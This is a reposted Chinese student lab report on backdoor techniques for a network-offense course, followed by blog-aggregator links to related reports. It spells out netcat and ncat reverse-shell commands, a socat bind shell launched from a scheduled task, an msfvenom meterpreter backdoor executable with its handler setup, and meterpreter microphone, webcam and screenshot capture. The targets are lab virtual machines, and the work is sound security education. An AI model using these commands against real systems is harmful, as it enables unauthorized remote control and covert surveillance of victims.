2017-2018-2 20155309南皓芯《网络对抗技术》Exp2 后门原理与实践

最新推荐文章于 2025-09-13 11:18:57 发布
转载 最新推荐文章于 2025-09-13 11:18:57 发布 · 165 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/nhx19970709/p/8685652.html
文章标签:

#操作系统 #shell #运维

本文详细介绍了一种使用netcat和socat获取远程主机Shell的方法,并演示了如何利用MSFmeterpreter生成可执行文件来获取目标主机的Shell。此外,还介绍了如何获取音频、摄像头等敏感信息及尝试提权。

实验要求

(1)使用netcat获取主机操作Shell,cron启动 (0.5分)

(2)使用socat获取主机操作Shell, 任务计划启动 (0.5分)

(3)使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell(0.5分)

(4)使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 (2分)

(5)可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell(1分)加分内容一并写入本实验报告。

实验内容

了解监听,对主机与客机有更深入的了解。

实验步骤

1.用nc或netcat获取远程主机的Shell

1.1.1 Windows获得Linux Shell

首先在windows下面打开监听

用ipconfig命令,找到自己的IP地址
192.168.234.129

1071511-20180328191426703-33869544.png

下载ncat并进入该目录,按windows + R组合键打开cmd.exe,输入ncat.exe -l -p 5309命令:

需要下载的netcat在老师提供的码云上

1071511-20180328194915960-1418116401.png

然后将其放在win7虚拟机下C盘即可

1071511-20180328201356626-1499408733.png

这时,防火墙会报警,这时为了实验的需求,我们要关闭所有的防火墙。

1071511-20180328201638781-509012839.jpg

我的防火墙实在windows defender下的防火墙

1071511-20180328202101842-499963957.png

1071511-20180328202239477-2105316565.png

2.Linux反弹连接Win,输入命令

nc 192.168.234.129 5309 -e /bin/sh

1071511-20180328203508655-1490312498.jpg

Windows下获得一个linux shell,可运行任何指令,如ls

1071511-20180328204011856-1690238559.jpg

1.2 Linux获得Win Shell

1.用ifconfig命令查看本机IP为
192.168.234.133

1071511-20180328205726854-1785127175.png

2.Linux运行监听指令,输入命令nc -l -p 5309

3.Windows反弹连接Linux,在ncat目录下输入命令
ncat.exe -e cmd.exe 192.168.234.133 5309

1071511-20180328210821326-1186569739.png

这样我们就可以随意查看文件了。
1071511-20180328211132346-1551752079.png

(2)使用socat获取主机操作Shell,

首先我们了解一下什么是socat

socat是一个多功能的网络工具,名字来由是“Socket CAT”,可以看作是netcat的N倍加强版

1.在Windows 7中打开开始菜单,搜索管理工具并打开

1071511-20180328212020631-45855355.png

找到任务计划程序并打开,点击创建任务:

1071511-20180328212218215-1405253298.png

1071511-20180328212533442-386366561.png

击触发器选项卡,选择新建,然后将开始任务设置为工作站锁定时

1071511-20180328213005479-1922549243.png

点击常规选项卡,输入名称(学号)

1071511-20180328213132641-1942342587.jpg

再点击操作选项卡,点击新建,程序或脚本中选择socat.exe路径,在添加参数一栏中写
tcp-listen:5309 exec:cmd.exe,pty,stderr
(作用是把cmd.exe绑定到端口5314,同时把cmd.exe的stderr重定向到stdout上),点击确定保存设置:

1071511-20180328221341829-2016960021.jpg

1071511-20180328221525867-1758464620.jpg

点击右栏中的显示所有正在运行的任务,找到刚刚创建的20155309任务,右键点击运行,此时会弹出一个黑色的框框表明成功运行:

1071511-20180328223922250-1901808239.jpg

在Kali Linux中输入socat - tcp:192.168.234.134 :5309
命令,可以成功得到一个cmd shell:

2 Meterpreter

使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

这个实验使用的IP地址还是win7的
192.168.234.129

在kali中输入:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.234.129 LPORT=5321 -f exe > 20155309_backdoor.exe

可以看到虚拟机显示这样的画面

1071511-20180329075149462-375805116.jpg

通过nc指令将生成的后门程序传送到Windows主机上

1071511-20180329122443840-1178630001.jpg

2.2 MSF打开监听进程

在Kali Linux中输入msfconsole命令:

1071511-20180329080255018-1196774725.jpg

每次输入msfconcole都有新体验

1071511-20180329080445568-971440970.jpg

1071511-20180329080726157-1565189081.jpg

再依次输入以下命令:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST 192.168.234.134

set LPORT 5309

show options

exploit

1071511-20180329081125192-798861412.jpg

1071511-20180329081858086-1786336945.png

注意:
IP地址选取的是kali虚拟机的。

接下来我们就可以做监听了。
要注意关闭win7的防火墙
1071511-20180329120606121-723869987.png

Win平台ncat目录下找到后门并双击运行20155309_backdoor.exe:

1071511-20180329122644775-547463366.png
然后我们就获取到了shellcode
1071511-20180401085827916-422398323.jpg

使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

使用record_mic指令可以截获一段音频:

1071511-20180401090132398-1326339772.png

使用webcam_snap指令可以使用摄像头进行拍照

1071511-20180401090341931-1272122505.png

色相头打开失败。

利用screenshot可以进行截屏。

实验过程中遇到的问题

1.无法进行监听

将网络设置改成桥接。

实验心得与体会

这次的实验算是这几个学期以来包括所有课最好玩的实验了。虽然可能之前基础比较差,但是现在也改变了自己原来的看法,想要去学习,想要去独立完成实验。反正想要去改变总是好的,浪子回头金不换,

转载于:https://www.cnblogs.com/nhx19970709/p/8685652.html

2017-2018-2 20155309 皓芯 Exp3 免杀原理实践
weixin_30627341的博客
04-10 173
报告内容 2.1.基础问题回答 (1)杀软是如何检测出恶意代码的 ? 1:基于特征码 一段特征码就是一段或多段数据。(如果一个可执行文件(或其他运行的库、脚本等)包含这样的数据则被认为是恶意代码) 杀毒软件有自己专门的特征码库,在检测一个程序是否是恶意代码时就看这个程序中的是否包含有特征码库中的特征码,如果有就进行查杀。但是特征码库并不是总是能第一时间更新,如果出现了特征码库中没有的新特征码,那么...
2017-2018-2 20155309皓芯 Exp8 WEB基础实践
weixin_30646315的博客
05-20 175
基础问题回答 (1)什么是表单 表单在网页中主要负责数据采集功能。一个表单有三个基本组成部分: 表单标签:这里面包含了处理表单数据所用CGI程序的URL以及数据提交到服务器的方法。 表单域:包含了文本框、密码框、隐藏域、多行文本框、复选框、单选框、下拉选择框和文件上传框等。 (2)浏览器可以解析运行什么语言。 html,css,javascript等脚本语言 (3)WebServer支持哪些动态语...
2017-2018-2 20155309 皓芯 Exp7 网络欺诈防范
weixin_30800807的博客
05-13 190
实践内容 本实践的目标理解常用网络欺诈背后的原理,以提高防范意识,并提出具体防范方法。具体实践有 1,简单应用SET工具建立冒名网站 2.ettercap DNS spoof 3.结合应用两种技术,用DNS spoof引导特定访问到冒名网站 基础问题回答 问:通常在什么场景下容易受到DNS spoof攻击? 答:同一局域网下,以及各种公共网络。 问:在日常生活工作中如何防范以上两攻击方法? 答:D...
2017-2018-2 20155309皓芯 Exp6 信息搜集漏洞扫描
weixin_30399821的博客
05-04 199
实践内容 1.各种搜索技巧的应用 2.DNS IP注册信息的查询 3.基本的扫描技术:主机发现、端口扫描、OS及服务版本探测、具体服务的查点 4.漏洞扫描:会扫,会看报告,会查漏洞说明,会修补漏洞 基础问题回答 1.哪些组织负责DNS,IP的管理。 顶级的管理者是Internet Corporation for Assigned Names and Numbers (ICANN)。 目前全球有5个...
2017-2018-2 20155309皓芯 Exp4 恶意代码分析
weixin_30851409的博客
04-17 186
实验后回答问题 (1)如果在工作中怀疑一台主机上有恶意代码,但只是猜想,所有想监控下系统一天天的到底在干些什么。请设计下你想监控的操作有哪些,用什么方法来监控。 答:我会使用sysmon工具来进行监控,可以每天晚上查看一下监控到的信息,还可以利用筛选工具对数据进行分析,监控网络连接,是否创建新的进程,注册表项目以及系统日志。 (2)如果已经确定是某个程序或进程有问题,你有什么工具可以进一步得到它的...
2017-2018-2 20155309 皓芯 Exp9 Web安全基础
weixin_30855099的博客
05-26 208
基础问题回答 1.SQL注入攻击原理,如何防御 原理:它是利用现有应用程序,将恶意的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入恶意SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执行SQL语句,最终达到欺骗服务器执行恶意的SQL命令。 本质:基于文本解析的机制无法分辨代码是否是恶意代码,仅仅是顺序读取和执行,因为通常文本解析的语言并不会进行编译。 ...
2017-2018-2 20155309 皓芯 Exp5 MSF基础应用
weixin_30532369的博客
05-01 177
实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成: 1.1一个主动攻击实践,如ms08_067; 1.2 一个针对浏览器的攻击,如ms11_050; 1.3 一个针对客户端的攻击,如Adobe; 1.4 成功应用任何一个辅助模块。 预备知识 1.MSF的六种模块 Exploit模块 : 是利用发现的安全漏洞或配置弱点对远程目标系统进行攻击,以...
2016-2017-2 20155309皓芯java第五周学习总结
weixin_30561177的博客
03-26 331
教材内容总结 这一周学习的进度和前几周比较的话是差不多的,都是学习两章。 异常处理 1.理解异常架构 2.牚握try...catch...finally处理异常的方法 3.会用throw,throws 4.理解Collection和Map架构 5.会用常见的数据结构和算法 6.了解Lambada和泛型 第八章内容主要是对Java的异常处理 Java的异常处理是通过5个关键字来实现的:try,cat...
2016-2017-2 20155309 皓芯java第六周学习总结
weixin_30511039的博客
04-02 184
教材内容详解 这一次主要学习的是第十章第十一章的内容。主要讲述了串流,字符处理和线程以及并行API。 输入输出 串流:Java中的数据有来源(source)和目的地(destination),衔接两者的就是串流对象2串流设计:在不知道限定数据来源和目的地时,也可以依赖抽象的InputStream和Outstream来编写一个dump()方法,方便以后使用3InputStream和Output...
性能测试工具JvisualVM/jconsole使用
平时的经验总结,学习历程
09-12 369
port是jmx的另一个通信端口。可以不设置,启动后系统会自动随机指定端口。如果关闭了防火墙,没有网络访问策略,可以不设置。如果服务器需要开通端口访问策略此处需要配置开通策略的端口。然后在windows客户机,安装jdk目录下的bin目录下找到jvisualvm.exe或jconsole,通过远程连接方式监控jvm的cpu 内存 线程 类加载的情况。com.sun.management.jmxremote.port 是客户端连接的端口。主要介绍远程使用方式,在启动参数添加如下参数。
Linux权限
Wangshijie1015的博客
09-10 750
所以就出现了所属者这个角色,有了所属者之后,如果李四说他想看这个文件,那你就将李四添加为该文件的所属者,并赋予所属者所需的权限,这样除了拥有者和所属者有所需权限,经由李四分享给其他人后,他们都是other,没有所需权限就无法对文件进行所需操作了。原因就是在Centos下,文件在确定用户角色的时候,确认的顺序是按拥有者,所属者,other这个顺序进行确认的,这里确定了wsj是拥有者的角色,那其权限就是---,一旦角色确认下来后,权限也就确定下来了,不会因为权限被拒绝后再去确认用户是不是其他角色。
RocketMQ 高可用集群原理深度解析性能优化实践
qq_35716689的博客
09-13 559
本文深入解析 RocketMQ 高可用集群的原理,探讨主备选举、消息存储路由流程,并结合真实业务场景提供性能优化实践建议和丰富的代码示例,帮助开发者构建高效稳定的消息系统。
【亲测有效】解决 “Batch script contains DOS line breaks (\r\n)” 报错
最新发布
欢迎来到我的优快云个人博客主页!
09-13 226
【摘要】本文针对Linux/Slurm集群上执行脚本时出现的 DOS line breaks (\r\n) 报错问题,分析原因是WindowsLinux换行符(CRLF vs LF)不兼容,并提供了5种解决方案:1)使用dos2unix命令转换;2)通过sed/tr命令手动去除回车符;3)用Vim修改文件格式;4)在VS Code中切换换行符;5)配置Git避免CRLF问题。最后还介绍了检查脚本是否残留\r的方法,并建议统一开发环境和配置编辑器默认使用LF换行符,以彻底解决此类问题。
设计模式(C++)详解—抽象工厂模式 (Abstract Factory)(2)
weixin_42108533的博客
09-12 756
抽象工厂模式详解 抽象工厂模式是一种创建型设计模式,用于创建一系列相关或依赖对象的家族。它解决了在不指定具体类的情况下创建相互关联的产品对象的问题。 核心特点: 提供"工厂的工厂"概念,能创建整套相互关联的产品 确保创建的产品能协同工作(如苹果生态设备) 客户端代码只依赖抽象接口,具体实现解耦 适用场景: 跨平台UI组件开发 数据库访问层 游戏开发中的不同风格角色/道具 主题系统切换 优势: 产品兼容性保证 易于切换整套产品族 符合开闭原则(新增产品族无需修改代码) 扩展性特点: 纵向
Linux笔记---进程间关系守护进程
2302_80372340的博客
09-09 1291
操作系统中,是由,用于简化对多个关联进程的统一管理。它是 Unix/Linux 系统中进程组织的重要概念,主要为了方便信号传递、作业控制等操作。每个进程组由唯一的 进程组 ID(PGID) 标识。通常,进程组的创建者(称为 “组长进程”)的进程 ID(PID)会作为该进程组的 PGID(即 PGID = 组长进程的PID)。什么是有关联的进程呢?有父子关系的进程、通过管道相连的进程……这些在操作系统层面上有关联,需要相互协作的进程就叫有关联的进程。
零基础快速了解掌握Linux防火墙-Iptables
uname_xuan的博客
09-11 789
本文详细介绍了Linux防火墙工具iptables的配置管理。文章首先概述了iptables的特点和核心组成(表、链、规则),然后重点讲解了配置方法:包括添加/删除规则、查看/修改策略、匹配条件设置等。特别介绍了NAT地址转换配置(SNAT和DNAT)以及防火墙策略的备份恢复方法。全文通过命令示例和流程说明,全面展示了iptables的灵活配置能力,适合作为Linux网络安全管理者的参考手册。
计算机2级公共基础知识常考知识点(二)
2401_83227843的博客
09-11 320
计算机2级公共基础知识常考知识点。
2025年渗透测试面试题总结-60(题目+回答)
soc的博客
09-09 1176
安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
PVE纵览-9.0重磅升级:全面解析新特性升级指
DreamLife
09-09 658
PVE 9.0重磅升级:核心特性升级指 Proxmox VE 9.0正式发布,基于Debian 13和Linux 6.14内核,带来多项关键升级: 存储增强:支持厚置备LVM快照,优化SAN环境快照管理; SDN网络:新增软件定义网络功能,简化复杂网络配置; 高可用性:引入资源亲和性规则,优化工作负载分布; 移动端:重构管理界面,提升移动设备操作体验。 升级包含底层组件全面更新(QEMU 10.0.2、LXC 6.0.4等),建议新部署直接使用9.0版本,现有环境需评估升级风险。
Linux上安装MySQL8详细教程
2301_79810514的博客
09-10 470
本文介绍了在Linux系统上安装MySQL 8.0的完整步骤:首先卸载系统自带的mariadb,创建mysql用户组和系统用户;然后上传并解压MySQL安装包,配置相关目录权限;接着初始化MySQL并修改配置文件,启动MySQL服务;最后修改root密码并设置远程访问权限。文章提供了详细的命令行操作和配置示例,包括重要参数设置和注意事项(如关闭防火墙)。整个过程涵盖了从环境准备到数据库初始化的完整流程,适合需要手动安装MySQL 8.0的用户参考。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值